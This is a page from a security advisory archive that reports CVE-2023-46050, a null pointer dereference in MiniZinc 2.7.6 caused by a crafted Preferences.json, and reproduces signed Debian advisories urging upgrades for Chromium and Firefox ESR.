SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW1XvtfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T6lQ//U5/FcuUV+SLF3IYzbSGP3nxOl3njQNMQz12woGd8SJdFpsEgeyOFUqwE1u6xUjNbryI3N/U3zGxEH3P5gZdcxXbQX3dWqHr6IrBC1ciBwKZrtmcmy9ME2OZd1r2QYGNxGYr2d/E9IV6lvT6L2MPeKTbEmAUjCGgY/nsPi9P2ECwufD7KEHh+6IXn5WRPEFIWioOXWhiBn02x612VHJUvux5geBz6oLkl9sc2V9coHx19kywaC9W2JMttSlyBaw3s7l2lv25rwTYCie1YmAgjsvnyZu3ijGMwHp/Sa7RYUkTC09S/fzuZlFOADz5HRslsjvlk0SomPg5A0J6eDYVQUqE3fq3A2zRtkDbeGbScAmc4eyR1d4LE0FqTPOUxZoCR84fP542vOqLimvfdnkkaPSJwcQJRrwKx4r/hYFwOi4W1gwy90at7MQljzwrfExMcXu9B3WmzmwAcTsX9nrgyiXNKH3Lib0gT+93TbqdhUNHuj9zC885JfOwxTh+jRaas4dyx4Tjaz83pJaUzEEIgAHByfr5N1UltvIUmO7AX9C9iLLyVVmgb2Qz0ujdc1N8XSqcvB52psJe5o6oEx6UbAVTH48PGrCuYY2kfzKKHYUan6n8MILRw8Is4FaUz4BAUd6Fjgo+jG/oS32grK7aujTbqRCiDaTDLcT/vywZldQA==giTa-----END PGP SIGNATURE-----

Debian Security Advisory 5608-1

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

**MiniZinc 2.7.6 Null Pointer**

Posted Jan 29, 2024

Authored by Meng Ruijie

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

tags | advisory

advisories | CVE-2023-46050

SHA-256 | a80cb0270b834776631af2ca8f8daa61229fb0418cf1801a697093adfbf995c9

Download | Favorite | View

**MiniZinc 2.7.6 Null Pointer**

    [Vulnerability description]A null pointer deference existed in MiniZinc v.2.7.6 via a crafted Preferences.json file.[VulnerabilityType Other]null pointer deference[Vendor of Product]MiniZinc[Affected Product Code Base]MiniZinc - 2.7.6[Reference]https://github.com/MiniZinc/libminizinc/issues/729[CVE Reference]The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46050 to this vulnerability.

**File Tags**

*   ActiveX (932)
*   Advisory (83,946)
*   Arbitrary (16,508)
*   BBS (2,859)
*   Bypass (1,810)
*   CGI (1,031)
*   Code Execution (7,521)
*   Conference (685)
*   Cracker (843)
*   CSRF (3,365)
*   DoS (24,223)
*   Encryption (2,377)
*   Exploit (52,460)
*   File Inclusion (4,241)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,819)
*   Intrusion Detection (902)
*   Java (3,111)
*   JavaScript (884)
*   Kernel (6,899)
*   Local (14,626)
*   Magazine (586)
*   Overflow (12,942)
*   Perl (1,429)
*   PHP (5,167)
*   Proof of Concept (2,359)
*   Protocol (3,677)
*   Python (1,585)
*   Remote (31,191)
*   Root (3,610)
*   Rootkit (517)
*   Ruby (615)
*   Scanner (1,646)
*   Security Tool (7,948)
*   Shell (3,224)
*   Shellcode (1,216)
*   Sniffer (898)
*   Spoof (2,236)
*   SQL Injection (16,468)
*   TCP (2,420)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,325)
*   Web (9,813)
*   Whitepaper (3,763)
*   x86 (966)
*   XSS (18,088)
*   Other

**File Archives**

*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,058)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,953)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,425)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,371)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (14,947)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,245)
*   UNIX (9,356)
*   UnixWare (187)
*   Windows (6,620)
*   Other

MiniZinc 2.7.6 Null Pointer

Debian Linux Security Advisory 5607-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5607-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonJanuary 24, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-0804 CVE-2024-0805 CVE-2024-0806 CVE-2024-0807                  CVE-2024-0808 CVE-2024-0809 CVE-2024-0810 CVE-2024-0811                  CVE-2024-0812 CVE-2024-0813 CVE-2024-0814Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 121.0.6167.85-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmWxsJcACgkQZF0CR8Nudjf95RAAixY6uKXWsFHmbQLeK3UHmFjUJEQhbuRbDKNeTd6nKW0+WyKVld5ztmbND0GKH/YXT87+4Mt1obi5UTprAgZKXHkuMfjwVjh5eCyOJzVTeLci3itrsTXWa/OPQoyQOZcqksPfY1TPkKv1NV67bbyVgZzztd1h8ExFSwD7NmU1WvWyWIbnhWzKBGYjl8REBpRroo+NP6LczpSvUDaEuFkv/Y8/2zqHykYfEKuLxZoDGlC9CbrAuVS3xPTh3RQREJhMhRa1+dRyPnJkvJTfJRthiwsRYyKmCSbUYHoxUJs9cEB8AA79SQq0pXbewGWN6DunaRiWup1j5BOr4Zy6xTqcml9du8H79Z9SPQOzVRomaoazceExb6a21taAdNtTq9C57jHWN5Sm9pifL+Jrlcykn4hX93NBijnOpPNmLqpgNobVQSTIP2zPVCftCk3iW1TgtpzjlwovoIHOUd1J0G2nz788QD10hBObLis3iZVU7jQymC4ERs6g0Gi7fTjpZtmgMHWT7s3OmUc2OcV/4zE/kHctVl/clfTlxeg43lrd73ETlS2dvRfiEWnA3x1aP4QQRRXJF3VZbPPg/90MVr5mxr2BCDmRLOhk/taeytN/D87xrE8sIMyEDgC4TLWc6XzKuj1SAuaUPq+xI3k+suFmZLfALebM5E9gGC+mC33SpiE==m20E-----END PGP SIGNATURE-----

Debian Security Advisory 5607-1

Debian Linux Security Advisory 5606-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, phishing, clickjacking, privilege escalation, HSTS bypass or bypass of content security policies.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5606-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 24, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-0741 CVE-2024-0742 CVE-2024-0746 CVE-2024-0747                  CVE-2024-0749 CVE-2024-0750 CVE-2024-0751 CVE-2024-0753                  CVE-2024-0755Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, phishing, clickjacking, privilege escalation, HSTS bypass orbypass of content security policies.For the oldstable distribution (bullseye), these problems have been fixedin version 115.7.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.7.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWxXEUACgkQEMKTtsN8TjZPIQ/+PSv6op0tJDa5J/C5jJo3w7dic4eb29gwL0NawP7UCWyi5gV5T0auzFDGhWkdc11XhCOFmVdObwcwLMnlx+VYQV4262ZwO1bUDjFa959Cw9i4uVlacqzOIUbxdfFUyIIH92LZd7P0ln5OCmyKrw0CR/cgKacTYen3U6VGyOB1V7ux7IudUh2v19V+VH5pUhLxWPi8ff9PMkC10j0GUwKZI2QncJo5990yg8tKgXrhVC7DXU/R97WQ9+FwqBb6RBezjIGK+rgfPrXSIX7rMVvjNTd0r22bqCr3jk/gJEt/u/oWbPETNUOTXlhOe7R4SIobP9GIhiSlHmY8ZHovbvvy5xfayW4GmlFj6JKZ3hxLdJ3PDwwTulH52v+wPuTo6yWeSE8TJFFps0jxN5gKwp6G0dpdixLYrG1ntLqUeDwDlcvp6b+KuzTB+IyfkVrGIXX/8mPJIHXGU2bFFHJL0i/JX34aKno1G9O8TWHGg5K3KHXhkKmoWklaiwt5Fe71c215JuPVY2dDetCyrM+MubDRX9NxpW41K2fonou37xVquIqpj5WKjw9HacIlpIpBCNzs2vbOI0uTV2cUEJnsv1TPvaDa4VnKm9tF6IfGpyFoW5muAichyBJTieN5ramWR2qDHSdqOMAUSADO5aoGUv8Mn8L5+k2BJHsCLfHU4Xe1MwM==0gOJ-----END PGP SIGNATURE-----

Tag

#debian